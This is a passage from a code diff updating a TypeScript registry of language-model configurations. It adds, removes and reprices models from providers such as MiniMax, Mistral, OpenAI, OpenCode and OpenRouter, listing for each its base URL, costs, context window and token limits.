+ cost: { + input: 0.3, + output: 1.2, + cacheRead: 0.06, + cacheWrite: 0.375, + }, + contextWindow: 204800, + maxTokens: 131072, + } satisfies Model<"anthropic-messages">, + "MiniMax-M2.7-highspeed": { + id: "MiniMax-M2.7-highspeed", + name: "MiniMax-M2.7-highspeed", + api: "anthropic-messages", + provider: "minimax", + baseUrl: "https://api.minimax.io/anthropic", + reasoning: true, + input: ["text"], + cost: { + input: 0.6, + output: 2.4, + cacheRead: 0.06, + cacheWrite: 0.375, + }, + contextWindow: 204800, + maxTokens: 131072, + } satisfies Model<"anthropic-messages">, }, "minimax-cn": { "MiniMax-M2": { @@ -4773,11 +4670,45 @@ export const MODELS = { contextWindow: 204800, maxTokens: 131072, } satisfies Model<"anthropic-messages">, + "MiniMax-M2.7": { + id: "MiniMax-M2.7", + name: "MiniMax-M2.7", + api: "anthropic-messages", + provider: "minimax-cn", + baseUrl: "https://api.minimaxi.com/anthropic", + reasoning: true, + input: ["text"], + cost: { + input: 0.3, + output: 1.2, + cacheRead: 0.06, + cacheWrite: 0.375, + }, + contextWindow: 204800, + maxTokens: 131072, + } satisfies Model<"anthropic-messages">, + "MiniMax-M2.7-highspeed": { + id: "MiniMax-M2.7-highspeed", + name: "MiniMax-M2.7-highspeed", + api: "anthropic-messages", + provider: "minimax-cn", + baseUrl: "https://api.minimaxi.com/anthropic", + reasoning: true, + input: ["text"], + cost: { + input: 0.6, + output: 2.4, + cacheRead: 0.06, + cacheWrite: 0.375, + }, + contextWindow: 204800, + maxTokens: 131072, + } satisfies Model<"anthropic-messages">, }, "mistral": { "codestral-latest": { id: "codestral-latest", - name: "Codestral", + name: "Codestral (latest)", api: "mistral-conversations", provider: "mistral", baseUrl: "https://api.mistral.ai", @@ -4828,7 +4759,7 @@ export const MODELS = { } satisfies Model<"mistral-conversations">, "devstral-medium-latest": { id: "devstral-medium-latest", - name: "Devstral 2", + name: "Devstral 2 (latest)", api: "mistral-conversations", provider: "mistral", baseUrl: "https://api.mistral.ai", @@ -4896,7 +4827,7 @@ export const MODELS = { } satisfies Model<"mistral-conversations">, "magistral-medium-latest": { id: "magistral-medium-latest", - name: "Magistral Medium", + name: "Magistral Medium (latest)", api: "mistral-conversations", provider: "mistral", baseUrl: "https://api.mistral.ai", @@ -4930,7 +4861,7 @@ export const MODELS = { } satisfies Model<"mistral-conversations">, "ministral-3b-latest": { id: "ministral-3b-latest", - name: "Ministral 3B", + name: "Ministral 3B (latest)", api: "mistral-conversations", provider: "mistral", baseUrl: "https://api.mistral.ai", @@ -4947,7 +4878,7 @@ export const MODELS = { } satisfies Model<"mistral-conversations">, "ministral-8b-latest": { id: "ministral-8b-latest", - name: "Ministral 8B", + name: "Ministral 8B (latest)", api: "mistral-conversations", provider: "mistral", baseUrl: "https://api.mistral.ai", @@ -4998,7 +4929,7 @@ export const MODELS = { } satisfies Model<"mistral-conversations">, "mistral-large-latest": { id: "mistral-large-latest", - name: "Mistral Large", + name: "Mistral Large (latest)", api: "mistral-conversations", provider: "mistral", baseUrl: "https://api.mistral.ai", @@ -5049,7 +4980,7 @@ export const MODELS = { } satisfies Model<"mistral-conversations">, "mistral-medium-latest": { id: "mistral-medium-latest", - name: "Mistral Medium", + name: "Mistral Medium (latest)", api: "mistral-conversations", provider: "mistral", baseUrl: "https://api.mistral.ai", @@ -5100,7 +5031,7 @@ export const MODELS = { } satisfies Model<"mistral-conversations">, "mistral-small-latest": { id: "mistral-small-latest", - name: "Mistral Small", + name: "Mistral Small (latest)", api: "mistral-conversations", provider: "mistral", baseUrl: "https://api.mistral.ai", @@ -5185,7 +5116,7 @@ export const MODELS = { } satisfies Model<"mistral-conversations">, "pixtral-large-latest": { id: "pixtral-large-latest", - name: "Pixtral Large", + name: "Pixtral Large (latest)", api: "mistral-conversations", provider: "mistral", baseUrl: "https://api.mistral.ai", @@ -5695,6 +5626,40 @@ export const MODELS = { contextWindow: 272000, maxTokens: 128000, } satisfies Model<"openai-responses">, + "gpt-5.4-mini": { + id: "gpt-5.4-mini", + name: "GPT-5.4 mini", + api: "openai-responses", + provider: "openai", + baseUrl: "https://api.openai.com/v1", + reasoning: true, + input: ["text", "image"], + cost: { + input: 0.75, + output: 4.5, + cacheRead: 0.075, + cacheWrite: 0, + }, + contextWindow: 400000, + maxTokens: 128000, + } satisfies Model<"openai-responses">, + "gpt-5.4-nano": { + id: "gpt-5.4-nano", + name: "GPT-5.4 nano", + api: "openai-responses", + provider: "openai", + baseUrl: "https://api.openai.com/v1", + reasoning: true, + input: ["text", "image"], + cost: { + input: 0.2, + output: 1.25, + cacheRead: 0.02, + cacheWrite: 0, + }, + contextWindow: 400000, + maxTokens: 128000, + } satisfies Model<"openai-responses">, "gpt-5.4-pro": { id: "gpt-5.4-pro", name: "GPT-5.4 Pro", @@ -6087,7 +6052,7 @@ export const MODELS = { cacheRead: 0.5, cacheWrite: 6.25, }, - contextWindow: 200000, + contextWindow: 1000000, maxTokens: 128000, } satisfies Model<"anthropic-messages">, "claude-sonnet-4": { @@ -6158,23 +6123,6 @@ export const MODELS = { contextWindow: 1048576, maxTokens: 65536, } satisfies Model<"google-generative-ai">, - "gemini-3-pro": { - id: "gemini-3-pro", - name: "Gemini 3 Pro", - api: "google-generative-ai", - provider: "opencode", - baseUrl: "https://opencode.ai/zen/v1", - reasoning: true, - input: ["text", "image"], - cost: { - input: 2, - output: 12, - cacheRead: 0.2, - cacheWrite: 0, - }, - contextWindow: 1048576, - maxTokens: 65536, - } satisfies Model<"google-generative-ai">, "gemini-3.1-pro": { id: "gemini-3.1-pro", name: "Gemini 3.1 Pro Preview", @@ -6192,40 +6140,6 @@ export const MODELS = { contextWindow: 1048576, maxTokens: 65536, } satisfies Model<"google-generative-ai">, - "glm-4.6": { - id: "glm-4.6", - name: "GLM-4.6", - api: "openai-completions", - provider: "opencode", - baseUrl: "https://opencode.ai/zen/v1", - reasoning: true, - input: ["text"], - cost: { - input: 0.6, - output: 2.2, - cacheRead: 0.1, - cacheWrite: 0, - }, - contextWindow: 204800, - maxTokens: 131072, - } satisfies Model<"openai-completions">, - "glm-4.7": { - id: "glm-4.7", - name: "GLM-4.7", - api: "openai-completions", - provider: "opencode", - baseUrl: "https://opencode.ai/zen/v1", - reasoning: true, - input: ["text"], - cost: { - input: 0.6, - output: 2.2, - cacheRead: 0.1, - cacheWrite: 0, - }, - contextWindow: 204800, - maxTokens: 131072, - } satisfies Model<"openai-completions">, "glm-5": { id: "glm-5", name: "GLM-5", @@ -6430,6 +6344,40 @@ export const MODELS = { contextWindow: 272000, maxTokens: 128000, } satisfies Model<"openai-responses">, + "gpt-5.4-mini": { + id: "gpt-5.4-mini", + name: "GPT-5.4 Mini", + api: "openai-responses", + provider: "opencode", + baseUrl: "https://opencode.ai/zen/v1", + reasoning: true, + input: ["text", "image"], + cost: { + input: 0.75, + output: 4.5, + cacheRead: 0.075, + cacheWrite: 0, + }, + contextWindow: 400000, + maxTokens: 128000, + } satisfies Model<"openai-responses">, + "gpt-5.4-nano": { + id: "gpt-5.4-nano", + name: "GPT-5.4 Nano", + api: "openai-responses", + provider: "opencode", + baseUrl: "https://opencode.ai/zen/v1", + reasoning: true, + input: ["text", "image"], + cost: { + input: 0.2, + output: 1.25, + cacheRead: 0.02, + cacheWrite: 0, + }, + contextWindow: 400000, + maxTokens: 128000, + } satisfies Model<"openai-responses">, "gpt-5.4-pro": { id: "gpt-5.4-pro", name: "GPT-5.4 Pro", @@ -6464,22 +6412,39 @@ export const MODELS = { contextWindow: 262144, maxTokens: 65536, } satisfies Model<"openai-completions">, - "minimax-m2.1": { - id: "minimax-m2.1", - name: "MiniMax M2.1", + "mimo-v2-omni-free": { + id: "mimo-v2-omni-free", + name: "MiMo V2 Omni Free", + api: "openai-completions", + provider: "opencode", + baseUrl: "https://opencode.ai/zen/v1", + reasoning: true, + input: ["text", "image"], + cost: { + input: 0, + output: 0, + cacheRead: 0, + cacheWrite: 0, + }, + contextWindow: 262144, + maxTokens: 64000, + } satisfies Model<"openai-completions">, + "mimo-v2-pro-free": { + id: "mimo-v2-pro-free", + name: "MiMo V2 Pro Free", api: "openai-completions", provider: "opencode", baseUrl: "https://opencode.ai/zen/v1", reasoning: true, input: ["text"], cost: { - input: 0.3, - output: 1.2, - cacheRead: 0.1, + input: 0, + output: 0, + cacheRead: 0, cacheWrite: 0, }, - contextWindow: 204800, - maxTokens: 131072, + contextWindow: 1048576, + maxTokens: 64000, } satisfies Model<"openai-completions">, "minimax-m2.5": { id: "minimax-m2.5", @@ -6515,6 +6480,23 @@ export const MODELS = { contextWindow: 204800, maxTokens: 131072, } satisfies Model<"anthropic-messages">, + "nemotron-3-super-free": { + id: "nemotron-3-super-free", + name: "Nemotron 3 Super Free", + api: "openai-completions", + provider: "opencode", + baseUrl: "https://opencode.ai/zen/v1", + reasoning: true, + input: ["text"], + cost: { + input: 0, + output: 0, + cacheRead: 0, + cacheWrite: 0, + }, + contextWindow: 1000000, + maxTokens: 128000, + } satisfies Model<"openai-completions">, }, "opencode-go": { "glm-5": { @@ -6568,6 +6550,23 @@ export const MODELS = { contextWindow: 204800, maxTokens: 131072, } satisfies Model<"anthropic-messages">, + "minimax-m2.7": { + id: "minimax-m2.7", + name: "MiniMax M2.7", + api: "anthropic-messages", + provider: "opencode-go", + baseUrl: "https://opencode.ai/zen/go", + reasoning: true, + input: ["text"], + cost: { + input: 0.3, + output: 1.2, + cacheRead: 0.06, + cacheWrite: 0, + }, + contextWindow: 204800, + maxTokens: 131072, + } satisfies Model<"anthropic-messages">, }, "openrouter": { "ai21/jamba-large-1.7": { @@ -7080,6 +7079,23 @@ export const MODELS = { contextWindow: 262144, maxTokens: 32768, } satisfies Model<"openai-completions">, + "bytedance-seed/seed-2.0-lite": { + id: "bytedance-seed/seed-2.0-lite", + name: "ByteDance Seed: Seed-2.0-Lite", + api: "openai-completions", + provider: "openrouter", + baseUrl: "https://openrouter.ai/api/v1", + reasoning: true, + input: ["text", "image"], + cost: { + input: 0.25, + output: 2, + cacheRead: 0, + cacheWrite: 0, + }, + contextWindow: 262144, + maxTokens: 131072, + } satisfies Model<"openai-completions">, "bytedance-seed/seed-2.0-mini": { id: "bytedance-seed/seed-2.0-mini", name: "ByteDance Seed: Seed-2.0-Mini", @@ -7159,11 +7175,11 @@ export const MODELS = { cost: { input: 0.19999999999999998, output: 0.77, - cacheRead: 0.13, + cacheRead: 0.135, cacheWrite: 0, }, contextWindow: 163840, - maxTokens: 163840, + maxTokens: 4096, } satisfies Model<"openai-completions">, "deepseek/deepseek-chat-v3.1": { id: "deepseek/deepseek-chat-v3.1", @@ -7233,23 +7249,6 @@ export const MODELS = { contextWindow: 163840, maxTokens: 4096, } satisfies Model<"openai-completions">, - "deepseek/deepseek-v3.1-terminus:exacto": { - id: "deepseek/deepseek-v3.1-terminus:exacto", - name: "DeepSeek: DeepSeek V3.1 Terminus (exacto)", - api: "openai-completions", - provider: "openrouter", - baseUrl: "https://openrouter.ai/api/v1", - reasoning: true, - input: ["text"], - cost: { - input: 0.21, - output: 0.7899999999999999, - cacheRead: 0.16799999999999998, - cacheWrite: 0, - }, - contextWindow: 163840, - maxTokens: 4096, - } satisfies Model<"openai-completions">, "deepseek/deepseek-v3.2": { id: "deepseek/deepseek-v3.2", name: "DeepSeek: DeepSeek V3.2", @@ -7259,13 +7258,13 @@ export const MODELS = { reasoning: true, input: ["text"], cost: { - input: 0.25, - output: 0.39999999999999997, - cacheRead: 0, + input: 0.26, + output: 0.38, + cacheRead: 0.13, cacheWrite: 0, }, contextWindow: 163840, - maxTokens: 65536, + maxTokens: 4096, } satisfies Model<"openai-completions">, "deepseek/deepseek-v3.2-exp": { id: "deepseek/deepseek-v3.2-exp", @@ -7522,40 +7521,6 @@ export const MODELS = { contextWindow: 1048576, maxTokens: 65536, } satisfies Model<"openai-completions">, - "google/gemma-3-27b-it": { - id: "google/gemma-3-27b-it", - name: "Google: Gemma 3 27B", - api: "openai-completions", - provider: "openrouter", - baseUrl: "https://openrouter.ai/api/v1", - reasoning: false, - input: ["text", "image"], - cost: { - input: 0.04, - output: 0.15, - cacheRead: 0.02, - cacheWrite: 0, - }, - contextWindow: 128000, - maxTokens: 65536, - } satisfies Model<"openai-completions">, - "google/gemma-3-27b-it:free": { - id: "google/gemma-3-27b-it:free", - name: "Google: Gemma 3 27B (free)", - api: "openai-completions", - provider: "openrouter", - baseUrl: "https://openrouter.ai/api/v1", - reasoning: false, - input: ["text", "image"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 131072, - maxTokens: 8192, - } satisfies Model<"openai-completions">, "inception/mercury": { id: "inception/mercury", name: "Inception: Mercury", @@ -7658,23 +7623,6 @@ export const MODELS = { contextWindow: 8192, maxTokens: 16384, } satisfies Model<"openai-completions">, - "meta-llama/llama-3.1-405b-instruct": { - id: "meta-llama/llama-3.1-405b-instruct", - name: "Meta: Llama 3.1 405B Instruct", - api: "openai-completions", - provider: "openrouter", - baseUrl: "https://openrouter.ai/api/v1", - reasoning: false, - input: ["text"], - cost: { - input: 4, - output: 4, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 131000, - maxTokens: 4096, - } satisfies Model<"openai-completions">, "meta-llama/llama-3.1-70b-instruct": { id: "meta-llama/llama-3.1-70b-instruct", name: "Meta: Llama 3.1 70B Instruct", @@ -7740,8 +7688,8 @@ export const MODELS = { cacheRead: 0, cacheWrite: 0, }, - contextWindow: 128000, - maxTokens: 128000, + contextWindow: 65536, + maxTokens: 4096, } satisfies Model<"openai-completions">, "meta-llama/llama-4-maverick": { id: "meta-llama/llama-4-maverick", @@ -7837,14 +7785,48 @@ export const MODELS = { reasoning: true, input: ["text"], cost: { - input: 0.295, - output: 1.2, - cacheRead: 0.03, + input: 0.19999999999999998, + output: 1.17, + cacheRead: 0.09999999999999999, + cacheWrite: 0, + }, + contextWindow: 196608, + maxTokens: 65536, + } satisfies Model<"openai-completions">, + "minimax/minimax-m2.5:free": { + id: "minimax/minimax-m2.5:free", + name: "MiniMax: MiniMax M2.5 (free)", + api: "openai-completions", + provider: "openrouter", + baseUrl: "https://openrouter.ai/api/v1", + reasoning: true, + input: ["text"], + cost: { + input: 0, + output: 0, + cacheRead: 0, cacheWrite: 0, }, contextWindow: 196608, maxTokens: 196608, } satisfies Model<"openai-completions">, + "minimax/minimax-m2.7": { + id: "minimax/minimax-m2.7", + name: "MiniMax: MiniMax M2.7", + api: "openai-completions", + provider: "openrouter", + baseUrl: "https://openrouter.ai/api/v1", + reasoning: true, + input: ["text"], + cost: { + input: 0.3, + output: 1.2, + cacheRead: 0.06, + cacheWrite: 0, + }, + contextWindow: 204800, + maxTokens: 131072, + } satisfies Model<"openai-completions">, "mistralai/codestral-2508": { id: "mistralai/codestral-2508", name: "Mistral: Codestral 2508", @@ -7856,7 +7838,7 @@ export const MODELS = { cost: { input: 0.3, output: 0.8999999999999999, - cacheRead: 0, + cacheRead: 0.03, cacheWrite: 0, }, contextWindow: 256000, @@ -7873,7 +7855,7 @@ export const MODELS = { cost: { input: 0.39999999999999997, output: 2, - cacheRead: 0, + cacheRead: 0.04, cacheWrite: 0, }, contextWindow: 262144, @@ -7890,7 +7872,7 @@ export const MODELS = { cost: { input: 0.39999999999999997, output: 2, - cacheRead: 0, + cacheRead: 0.04, cacheWrite: 0, }, contextWindow: 131072, @@ -7907,7 +7889,7 @@ export const MODELS = { cost: { input: 0.09999999999999999, output: 0.3, - cacheRead: 0, + cacheRead: 0.01, cacheWrite: 0, }, contextWindow: 131072, @@ -7924,7 +7906,7 @@ export const MODELS = { cost: { input: 0.19999999999999998, output: 0.19999999999999998, - cacheRead: 0, + cacheRead: 0.02, cacheWrite: 0, }, contextWindow: 262144, @@ -7941,7 +7923,7 @@ export const MODELS = { cost: { input: 0.09999999999999999, output: 0.09999999999999999, - cacheRead: 0, + cacheRead: 0.01, cacheWrite: 0, }, contextWindow: 131072, @@ -7958,7 +7940,7 @@ export const MODELS = { cost: { input: 0.15, output: 0.15, - cacheRead: 0, + cacheRead: 0.015, cacheWrite: 0, }, contextWindow: 262144, @@ -7975,7 +7957,7 @@ export const MODELS = { cost: { input: 2, output: 6, - cacheRead: 0, + cacheRead: 0.19999999999999998, cacheWrite: 0, }, contextWindow: 128000, @@ -7992,7 +7974,7 @@ export const MODELS = { cost: { input: 2, output: 6, - cacheRead: 0, + cacheRead: 0.19999999999999998, cacheWrite: 0, }, contextWindow: 131072, @@ -8009,7 +7991,7 @@ export const MODELS = { cost: { input: 2, output: 6, - cacheRead: 0, + cacheRead: 0.19999999999999998, cacheWrite: 0, }, contextWindow: 131072, @@ -8026,7 +8008,7 @@ export const MODELS = { cost: { input: 0.5, output: 1.5, - cacheRead: 0, + cacheRead: 0.049999999999999996, cacheWrite: 0, }, contextWindow: 262144, @@ -8043,7 +8025,7 @@ export const MODELS = { cost: { input: 0.39999999999999997, output: 2, - cacheRead: 0, + cacheRead: 0.04, cacheWrite: 0, }, contextWindow: 131072, @@ -8060,7 +8042,7 @@ export const MODELS = { cost: { input: 0.39999999999999997, output: 2, - cacheRead: 0, + cacheRead: 0.04, cacheWrite: 0, }, contextWindow: 131072, @@ -8094,7 +8076,7 @@ export const MODELS = { cost: { input: 0.19999999999999998, output: 0.6, - cacheRead: 0, + cacheRead: 0.02, cacheWrite: 0, }, contextWindow: 32768, @@ -8117,6 +8099,23 @@ export const MODELS = { contextWindow: 32768, maxTokens: 16384, } satisfies Model<"openai-completions">, + "mistralai/mistral-small-2603": { + id: "mistralai/mistral-small-2603", + name: "Mistral: Mistral Small 4", + api: "openai-completions", + provider: "openrouter", + baseUrl: "https://openrouter.ai/api/v1", + reasoning: true, + input: ["text", "image"], + cost: { + input: 0.15, + output: 0.6, + cacheRead: 0.015, + cacheWrite: 0, + }, + contextWindow: 262144, + maxTokens: 4096, + } satisfies Model<"openai-completions">, "mistralai/mistral-small-3.1-24b-instruct:free": { id: "mistralai/mistral-small-3.1-24b-instruct:free", name: "Mistral: Mistral Small 3.1 24B (free)", @@ -8143,13 +8142,13 @@ export const MODELS = { reasoning: false, input: ["text", "image"], cost: { - input: 0.06, - output: 0.18, - cacheRead: 0.03, + input: 0.075, + output: 0.19999999999999998, + cacheRead: 0, cacheWrite: 0, }, - contextWindow: 131072, - maxTokens: 131072, + contextWindow: 128000, + maxTokens: 4096, } satisfies Model<"openai-completions">, "mistralai/mistral-small-creative": { id: "mistralai/mistral-small-creative", @@ -8162,7 +8161,7 @@ export const MODELS = { cost: { input: 0.09999999999999999, output: 0.3, - cacheRead: 0, + cacheRead: 0.01, cacheWrite: 0, }, contextWindow: 32768, @@ -8179,7 +8178,7 @@ export const MODELS = { cost: { input: 2, output: 6, - cacheRead: 0, + cacheRead: 0.19999999999999998, cacheWrite: 0, }, contextWindow: 65536, @@ -8213,7 +8212,7 @@ export const MODELS = { cost: { input: 2, output: 6, - cacheRead: 0, + cacheRead: 0.19999999999999998, cacheWrite: 0, }, contextWindow: 131072, @@ -8230,7 +8229,7 @@ export const MODELS = { cost: { input: 0.09999999999999999, output: 0.3, - cacheRead: 0, + cacheRead: 0.01, cacheWrite: 0, }, contextWindow: 32000, @@ -8270,23 +8269,6 @@ export const MODELS = { contextWindow: 131072, maxTokens: 4096, } satisfies Model<"openai-completions">, - "moonshotai/kimi-k2-0905:exacto": { - id: "moonshotai/kimi-k2-0905:exacto", - name: "MoonshotAI: Kimi K2 0905 (exacto)", - api: "openai-completions", - provider: "openrouter", - baseUrl: "https://openrouter.ai/api/v1", - reasoning: false, - input: ["text"], - cost: { - input: 0.6, - output: 2.5, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 262144, - maxTokens: 4096, - } satisfies Model<"openai-completions">, "moonshotai/kimi-k2-thinking": { id: "moonshotai/kimi-k2-thinking", name: "MoonshotAI: Kimi K2 Thinking", @@ -8406,6 +8388,40 @@ export const MODELS = { contextWindow: 256000, maxTokens: 4096, } satisfies Model<"openai-completions">, + "nvidia/nemotron-3-super-120b-a12b": { + id: "nvidia/nemotron-3-super-120b-a12b", + name: "NVIDIA: Nemotron 3 Super", + api: "openai-completions", + provider: "openrouter", + baseUrl: "https://openrouter.ai/api/v1", + reasoning: true, + input: ["text"], + cost: { + input: 0.09999999999999999, + output: 0.5, + cacheRead: 0.04, + cacheWrite: 0, + }, + contextWindow: 262144, + maxTokens: 4096, + } satisfies Model<"openai-completions">, + "nvidia/nemotron-3-super-120b-a12b:free": { + id: "nvidia/nemotron-3-super-120b-a12b:free", + name: "NVIDIA: Nemotron 3 Super (free)", + api: "openai-completions", + provider: "openrouter", + baseUrl: "https://openrouter.ai/api/v1", + reasoning: true, + input: ["text"], + cost: { + input: 0, + output: 0, + cacheRead: 0, + cacheWrite: 0, + }, + contextWindow: 262144, + maxTokens: 262144, + } satisfies Model<"openai-completions">, "nvidia/nemotron-nano-12b-v2-vl:free": { id: "nvidia/nemotron-nano-12b-v2-vl:free", name: "NVIDIA: Nemotron Nano 12B 2 VL (free)", @@ -9103,6 +9119,40 @@ export const MODELS = { contextWindow: 1050000, maxTokens: 128000, } satisfies Model<"openai-completions">, + "openai/gpt-5.4-mini": { + id: "openai/gpt-5.4-mini", + name: "OpenAI: GPT-5.4 Mini", + api: "openai-completions", + provider: "openrouter", + baseUrl: "https://openrouter.ai/api/v1", + reasoning: true, + input: ["text", "image"], + cost: { + input: 0.75, + output: 4.5, + cacheRead: 0.075, + cacheWrite: 0, + }, + contextWindow: 400000, + maxTokens: 128000, + } satisfies Model<"openai-completions">, + "openai/gpt-5.4-nano": { + id: "openai/gpt-5.4-nano", + name: "OpenAI: GPT-5.4 Nano", + api: "openai-completions", + provider: "openrouter", + baseUrl: "https://openrouter.ai/api/v1", + reasoning: true, + input: ["text", "image"], + cost: { + input: 0.19999999999999998, + output: 1.25, + cacheRead: 0.02, + cacheWrite: 0, + }, + contextWindow: 400000, + maxTokens: 128000, + } satisfies Model<"openai-completions">, "openai/gpt-5.4-pro": { id: "openai/gpt-5.4-pro", name: "OpenAI: GPT-5.4 Pro", @@ -9137,23 +9187,6 @@ export const MODELS = { contextWindow: 131072, maxTokens: 4096, } satisfies Model<"openai-completions">, - "openai/gpt-oss-120b:exacto": { - id: "openai/gpt-oss-120b:exacto", - name: "OpenAI: gpt-oss-120b (exacto)", - api: "openai-completions", - provider: "openrouter", - baseUrl: "https://openrouter.ai/api/v1", - reasoning: true, - input: ["text"], - cost: { - input: 0.039, - output: 0.19, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 131072, - maxTokens: 4096, - } satisfies Model<"openai-completions">, "openai/gpt-oss-120b:free": { id: "openai/gpt-oss-120b:free", name: "OpenAI: gpt-oss-120b (free)", @@ -9181,12 +9214,12 @@ export const MODELS = { input: ["text"], cost: { input: 0.03, - output: 0.14, - cacheRead: 0, + output: 0.11, + cacheRead: 0.015, cacheWrite: 0, }, contextWindow: 131072, - maxTokens: 4096, + maxTokens: 131072, } satisfies Model<"openai-completions">, "openai/gpt-oss-20b:free": { id: "openai/gpt-oss-20b:free", @@ -9228,7 +9261,7 @@ export const MODELS = { api: "openai-completions", provider: "openrouter", baseUrl: "https://openrouter.ai/api/v1", - reasoning: false, + reasoning: true, input: ["text", "image"], cost: { input: 15, @@ -9279,7 +9312,7 @@ export const MODELS = { api: "openai-completions", provider: "openrouter", baseUrl: "https://openrouter.ai/api/v1", - reasoning: false, + reasoning: true, input: ["text"], cost: { input: 1.1, @@ -9296,7 +9329,7 @@ export const MODELS = { api: "openai-completions", provider: "openrouter", baseUrl: "https://openrouter.ai/api/v1", - reasoning: false, + reasoning: true, input: ["text"], cost: { input: 1.1, @@ -9486,9 +9519,9 @@ export const MODELS = { reasoning: false, input: ["text"], cost: { - input: 0.39999999999999997, - output: 1.2, - cacheRead: 0.08, + input: 0.26, + output: 0.78, + cacheRead: 0.052000000000000005, cacheWrite: 0, }, contextWindow: 1000000, @@ -9554,8 +9587,8 @@ export const MODELS = { reasoning: false, input: ["text", "image"], cost: { - input: 0.7999999999999999, - output: 3.1999999999999997, + input: 0.52, + output: 2.08, cacheRead: 0, cacheWrite: 0, }, @@ -9622,13 +9655,13 @@ export const MODELS = { reasoning: true, input: ["text"], cost: { - input: 0.11, - output: 0.6, - cacheRead: 0.055, + input: 0.14950000000000002, + output: 1.495, + cacheRead: 0, cacheWrite: 0, }, - contextWindow: 262144, - maxTokens: 262144, + contextWindow: 131072, + maxTokens: 4096, } satisfies Model<"openai-completions">, "qwen/qwen3-30b-a3b": { id: "qwen/qwen3-30b-a3b", @@ -9673,13 +9706,13 @@ export const MODELS = { reasoning: true, input: ["text"], cost: { - input: 0.051, - output: 0.33999999999999997, - cacheRead: 0, + input: 0.08, + output: 0.39999999999999997, + cacheRead: 0.08, cacheWrite: 0, }, - contextWindow: 32768, - maxTokens: 4096, + contextWindow: 131072, + maxTokens: 131072, } satisfies Model<"openai-completions">, "qwen/qwen3-32b": { id: "qwen/qwen3-32b", @@ -9817,23 +9850,6 @@ export const MODELS = { contextWindow: 1000000, maxTokens: 65536, } satisfies Model<"openai-completions">, - "qwen/qwen3-coder:exacto": { - id: "qwen/qwen3-coder:exacto", - name: "Qwen: Qwen3 Coder 480B A35B (exacto)", - api: "openai-completions", - provider: "openrouter", - baseUrl: "https://openrouter.ai/api/v1", - reasoning: false, - input: ["text"], - cost: { - input: 0.22, - output: 1.7999999999999998, - cacheRead: 0.022, - cacheWrite: 0, - }, - contextWindow: 262144, - maxTokens: 65536, - } satisfies Model<"openai-completions">, "qwen/qwen3-coder:free": { id: "qwen/qwen3-coder:free", name: "Qwen: Qwen3 Coder 480B A35B (free)", @@ -9860,9 +9876,9 @@ export const MODELS = { reasoning: false, input: ["text"], cost: { - input: 1.2, - output: 6, - cacheRead: 0.24, + input: 0.78, + output: 3.9, + cacheRead: 0.156, cacheWrite: 0, }, contextWindow: 262144, @@ -9928,13 +9944,13 @@ export const MODELS = { reasoning: true, input: ["text"], cost: { - input: 0.15, - output: 1.2, + input: 0.0975, + output: 0.78, cacheRead: 0, cacheWrite: 0, }, - contextWindow: 128000, - maxTokens: 4096, + contextWindow: 131072, + maxTokens: 32768, } satisfies Model<"openai-completions">, "qwen/qwen3-vl-235b-a22b-instruct": { id: "qwen/qwen3-vl-235b-a22b-instruct", @@ -9962,8 +9978,8 @@ export const MODELS = { reasoning: true, input: ["text", "image"], cost: { - input: 0, - output: 0, + input: 0.26, + output: 2.6, cacheRead: 0, cacheWrite: 0, }, @@ -9996,8 +10012,8 @@ export const MODELS = { reasoning: true, input: ["text", "image"], cost: { - input: 0, - output: 0, + input: 0.13, + output: 1.56, cacheRead: 0, cacheWrite: 0, }, @@ -10123,6 +10139,23 @@ export const MODELS = { contextWindow: 262144, maxTokens: 65536, } satisfies Model<"openai-completions">, + "qwen/qwen3.5-9b": { + id: "qwen/qwen3.5-9b", + name: "Qwen: Qwen3.5-9B", + api: "openai-completions", + provider: "openrouter", + baseUrl: "https://openrouter.ai/api/v1", + reasoning: true, + input: ["text", "image"], + cost: { + input: 0.049999999999999996, + output: 0.15, + cacheRead: 0, + cacheWrite: 0, + }, + contextWindow: 256000, + maxTokens: 4096, + } satisfies Model<"openai-completions">, "qwen/qwen3.5-flash-02-23": { id: "qwen/qwen3.5-flash-02-23", name: "Qwen: Qwen3.5-Flash", @@ -10132,8 +10165,8 @@ export const MODELS = { reasoning: true, input: ["text", "image"], cost: { - input: 0.09999999999999999, - output: 0.39999999999999997, + input: 0.065, + output: 0.26, cacheRead: 0, cacheWrite: 0, }, @@ -10167,12 +10200,12 @@ export const MODELS = { input: ["text"], cost: { input: 0.15, - output: 0.39999999999999997, + output: 0.58, cacheRead: 0, cacheWrite: 0, }, - contextWindow: 32768, - maxTokens: 32768, + contextWindow: 131072, + maxTokens: 131072, } satisfies Model<"openai-completions">, "relace/relace-search": { id: "relace/relace-search", @@ -10217,13 +10250,13 @@ export const MODELS = { reasoning: false, input: ["text"], cost: { - input: 0.65, - output: 0.75, + input: 0.85, + output: 0.85, cacheRead: 0, cacheWrite: 0, }, - contextWindow: 32768, - maxTokens: 32768, + contextWindow: 131072, + maxTokens: 16384, } satisfies Model<"openai-completions">, "stepfun/step-3.5-flash": { id: "stepfun/step-3.5-flash", @@ -10302,9 +10335,9 @@ export const MODELS = { reasoning: true, input: ["text"], cost: { - input: 0.25, - output: 0.85, - cacheRead: 0.125, + input: 0.3, + output: 1.1, + cacheRead: 0.15, cacheWrite: 0, }, contextWindow: 163840, @@ -10446,6 +10479,23 @@ export const MODELS = { contextWindow: 2000000, maxTokens: 30000, } satisfies Model<"openai-completions">, + "x-ai/grok-4.20-beta": { + id: "x-ai/grok-4.20-beta", + name: "xAI: Grok 4.20 Beta", + api: "openai-completions", + provider: "openrouter", + baseUrl: "https://openrouter.ai/api/v1", + reasoning: true, + input: ["text", "image"], + cost: { + input: 2, + output: 6, + cacheRead: 0.19999999999999998, + cacheWrite: 0, + }, + contextWindow: 2000000, + maxTokens: 4096, + } satisfies Model<"openai-completions">, "x-ai/grok-code-fast-1": { id: "x-ai/grok-code-fast-1", name: "xAI: Grok Code Fast 1", @@ -10480,6 +10530,40 @@ export const MODELS = { contextWindow: 262144, maxTokens: 65536, } satisfies Model<"openai-completions">, + "xiaomi/mimo-v2-omni": { + id: "xiaomi/mimo-v2-omni", + name: "Xiaomi: MiMo-V2-Omni", + api: "openai-completions", + provider: "openrouter", + baseUrl: "https://openrouter.ai/api/v1", + reasoning: true, + input: ["text", "image"], + cost: { + input: 0.39999999999999997, + output: 2, + cacheRead: 0.08, + cacheWrite: 0, + }, + contextWindow: 262144, + maxTokens: 65536, + } satisfies 